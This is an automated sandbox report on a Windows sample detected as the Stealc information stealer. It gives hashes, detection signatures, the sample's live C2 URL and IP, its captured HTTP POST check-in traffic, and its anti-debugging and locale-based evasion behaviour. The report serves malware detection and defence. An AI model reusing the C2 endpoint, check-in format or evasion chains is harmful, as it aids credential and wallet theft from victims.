Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mrkjKujfkP.exe

Overview

General Information

Sample name:mrkjKujfkP.exe
renamed because original name is a hash value
Original sample name:ec37b9184eb3457fff8057affeb6ffd5.exe
Analysis ID:1386666
MD5:ec37b9184eb3457fff8057affeb6ffd5
SHA1:4c9c17d1874a44e9708976736620b75d033274de
SHA256:152e23b6a0f48147c40ceef6fb08f9702ff4da2fee7fbea4afe5c7c6b2cd35b0
Tags:exeStealc
Infos:

Detection

Stealc
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Stealc
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • mrkjKujfkP.exe (PID: 2148 cmdline: C:\Users\user\Desktop\mrkjKujfkP.exe MD5: EC37B9184EB3457FFF8057AFFEB6FFD5)
    • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://91.206.178.118/31b57f88e9b186cd.php"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    Process Memory Space: mrkjKujfkP.exe PID: 2148JoeSecurity_StealcYara detected StealcJoe Security
      No Sigma rule has matched
      Timestamp:192.168.2.591.206.178.11849705802044243 02/05/24-10:47:04.601026
      SID:2044243
      Source Port:49705
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://91.206.178.118/31b57f88e9b186cd.php"}
      Source: http://91.206.178.118/Virustotal: Detection: 8%Perma Link
      Source: http://91.206.178.118Virustotal: Detection: 8%Perma Link
      Source: http://91.206.178.118/31b57f88e9b186cd.phpVirustotal: Detection: 13%Perma Link
      Source: mrkjKujfkP.exeVirustotal: Detection: 33%Perma Link
      Source: mrkjKujfkP.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D192E0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D192E0
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D32520 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00D32520
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D1A620 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,HeapAlloc,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D1A620
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D1BB80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00D1BB80
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D1BB20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00D1BB20
      Source: mrkjKujfkP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: mrkjKujfkP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC934A FindFirstFileExW,0_2_00CC934A

      Networking

      barindex
      Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49705 -> 91.206.178.118:80
      Source: Malware configuration extractorURLs: http://91.206.178.118/31b57f88e9b186cd.php
      Source: global trafficHTTP traffic detected: POST /31b57f88e9b186cd.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 91.206.178.118Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 46 44 34 39 46 45 37 32 39 39 31 33 31 32 36 34 37 36 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 45 55 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="hwid"90FD49FE72991312647697------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="build"EU------EGCFIDAFBFBAKFHJEGIJ--
      Source: Joe Sandbox ViewASN Name: ARTNET2PL ARTNET2PL
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.118
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D192E0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D192E0
      Source: unknownHTTP traffic detected: POST /31b57f88e9b186cd.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 91.206.178.118Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 46 44 34 39 46 45 37 32 39 39 31 33 31 32 36 34 37 36 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 45 55 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="hwid"90FD49FE72991312647697------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="build"EU------EGCFIDAFBFBAKFHJEGIJ--
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B3D000.00000004.00000020.00020000.00000000.sdmp, mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/31b57f88e9b186cd.php
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/31b57f88e9b186cd.php0
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/31b57f88e9b186cd.phpW
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.118/31b57f88e9b186cd.php_
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC1290 GetModuleHandleA,GetProcAddress,VirtualAlloc,NtUnmapViewOfSection,NtUnmapViewOfSection,LoadLibraryA,GetProcAddress,GetProcAddress,lstrlenW,CreateThread,Sleep,WaitForSingleObject,0_2_00CC1290
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC10000_2_00CC1000
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CD05B10_2_00CD05B1
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC2EA00_2_00CC2EA0
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D128E80_2_00D128E8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D12CE80_2_00D12CE8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D130E80_2_00D130E8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D134E80_2_00D134E8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D129E80_2_00D129E8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D12DE80_2_00D12DE8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D131E80_2_00D131E8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D12AE80_2_00D12AE8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D12EE80_2_00D12EE8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D132E80_2_00D132E8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D136300_2_00D13630
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D127C00_2_00D127C0
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D12BE80_2_00D12BE8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D12FE80_2_00D12FE8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D133E80_2_00D133E8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: String function: 00CC4900 appears 33 times
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeSection loaded: netutils.dllJump to behavior
      Source: mrkjKujfkP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal92.troj.evad.winEXE@2/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: mrkjKujfkP.exeVirustotal: Detection: 33%
      Source: unknownProcess created: C:\Users\user\Desktop\mrkjKujfkP.exe C:\Users\user\Desktop\mrkjKujfkP.exe
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: mrkjKujfkP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: mrkjKujfkP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC1290 GetModuleHandleA,GetProcAddress,VirtualAlloc,NtUnmapViewOfSection,NtUnmapViewOfSection,LoadLibraryA,GetProcAddress,GetProcAddress,lstrlenW,CreateThread,Sleep,WaitForSingleObject,0_2_00CC1290
      Source: mrkjKujfkP.exeStatic PE information: section name: .1eKI8
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CD1520 push eax; ret 0_2_00CD1540
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CD0CC1 push ecx; ret 0_2_00CD0CD4
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D32EF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D32EF0

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-12212
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-10842
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC934A FindFirstFileExW,0_2_00CC934A
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D300F0 EntryPoint,GetSystemInfo,GetUserDefaultLangID,GetProcessHeap,HeapAlloc,GetUserNameA,GetProcessHeap,HeapAlloc,GetComputerNameA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,OpenEventA,CreateEventA,0_2_00D300F0
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeAPI call chain: ExitProcess graph end nodegraph_0-12202
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeAPI call chain: ExitProcess graph end nodegraph_0-12218
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeAPI call chain: ExitProcess graph end nodegraph_0-12210
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeAPI call chain: ExitProcess graph end nodegraph_0-12225
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC70E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC70E3
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC1290 GetModuleHandleA,GetProcAddress,VirtualAlloc,NtUnmapViewOfSection,NtUnmapViewOfSection,LoadLibraryA,GetProcAddress,GetProcAddress,lstrlenW,CreateThread,Sleep,WaitForSingleObject,0_2_00CC1290
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC1290 mov eax, dword ptr fs:[00000030h]0_2_00CC1290
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D32B80 mov eax, dword ptr fs:[00000030h]0_2_00D32B80
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CCBA64 GetProcessHeap,0_2_00CCBA64
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC70E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC70E3
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC483A SetUnhandledExceptionFilter,0_2_00CC483A
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC46DE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC46DE
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC4B33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CC4B33
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC4945 cpuid 0_2_00CC4945
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00CC45C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00CC45C5
      Source: C:\Users\user\Desktop\mrkjKujfkP.exeCode function: 0_2_00D110C0 GetProcessHeap,HeapAlloc,GetComputerNameA,GetProcessHeap,HeapAlloc,GetUserNameA,ExitProcess,0_2_00D110C0

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: mrkjKujfkP.exe PID: 2148, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: mrkjKujfkP.exe PID: 2148, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Native API
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Process Injection
      LSASS Memory21
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information
      NTDS1
      Account Discovery
      Distributed Component Object ModelInput Capture11
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      System Owner/User Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync123
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      mrkjKujfkP.exe33%VirustotalBrowse
      mrkjKujfkP.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://91.206.178.118/0%Avira URL Cloudsafe
      http://91.206.178.118/31b57f88e9b186cd.php00%Avira URL Cloudsafe
      http://91.206.178.118/31b57f88e9b186cd.php0%Avira URL Cloudsafe
      http://91.206.178.1180%Avira URL Cloudsafe
      http://91.206.178.118/31b57f88e9b186cd.php_0%Avira URL Cloudsafe
      http://91.206.178.118/31b57f88e9b186cd.phpW0%Avira URL Cloudsafe
      http://91.206.178.118/9%VirustotalBrowse
      http://91.206.178.1189%VirustotalBrowse
      http://91.206.178.118/31b57f88e9b186cd.php13%VirustotalBrowse
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://91.206.178.118/31b57f88e9b186cd.phptrue
      • 13%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://91.206.178.118/mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B3D000.00000004.00000020.00020000.00000000.sdmptrue
      • 9%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://91.206.178.118/31b57f88e9b186cd.php_mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://91.206.178.118/31b57f88e9b186cd.php0mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://91.206.178.118mrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000AEE000.00000004.00000020.00020000.00000000.sdmptrue
      • 9%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://91.206.178.118/31b57f88e9b186cd.phpWmrkjKujfkP.exe, 00000000.00000002.2053299883.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
